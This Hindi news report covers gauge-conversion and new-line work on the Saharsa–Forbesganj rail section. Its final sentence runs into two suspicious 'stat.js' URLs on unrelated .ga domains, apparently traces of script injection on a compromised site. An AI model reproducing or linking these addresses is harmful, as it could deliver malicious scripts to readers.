सहरसा-फारबिसगंज रेलखंड पर सरायगढ़ और ललितग्राम रेलवे स्टेशन के बीच तेजी से चल रहे अमान-परिवर्तन कार्य एवं सरायगढ़-निर्मली नई रेलवे लाइन कार्य तेजी से प्रगति कर रहा है। नये साल में ट्रेन नई दूरी नापते हुए आसनपुर कुपहा से निर्मली और राघोपुर से ललितग्राम तक जाने लगेगी।

 

दरअसल, इस साल के भूकंप मे रेलखंड ध्वस्त हो गया और रेल का परिचालन पूर्ण रूप से बाधित हो गया। भूकंप के कारण रेल पुल भी ध्वस्त हो गया था। अमान-परिवर्तन के कार्य के बाद सहरसा से कोसी नदी पर बने रेल महासेतु के रास्ते ट्रेन आसनपुर कुपहा तक पहुंच गई है। अब ट्रेन के निर्मली पहुंचने का इंतजार किया जा रहा है।

 

 

इधर रेलवे का कार्य भी प्रगति पर है। निर्मली तक रेल पटरी और रेल लाइन बिछा दी गई है। विभाग का भी प्रयास है कि नये साल के शुरुआती महीनों में इस रेलखंड पर रेल का परिचालन सुनिश्चित कर दिया जाए। रेलवे का प्रयास है कि मार्च 2021 से पूर्व ललितग्राम रेलवे सटेशन तक ट्रेन का परिचालन सुनिश्चित कराया जाए।

 

आमान-परिवर्तन के क्रम में ललितग्राम स्टेशन तक पटरी और रेल लाइन बिछाने का काम पूरा कर लिया गया है। अब ब्लाङ्क्षस्टग का कार्य शुरू हो गया है और जल्द ही स्पीड ट्रायल और सीआरएस निरीक्षण के बाद ललितग्राम रेलवे स्टेशन तक ट्रेन के परिचालन शुरू कर दिया जाएगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.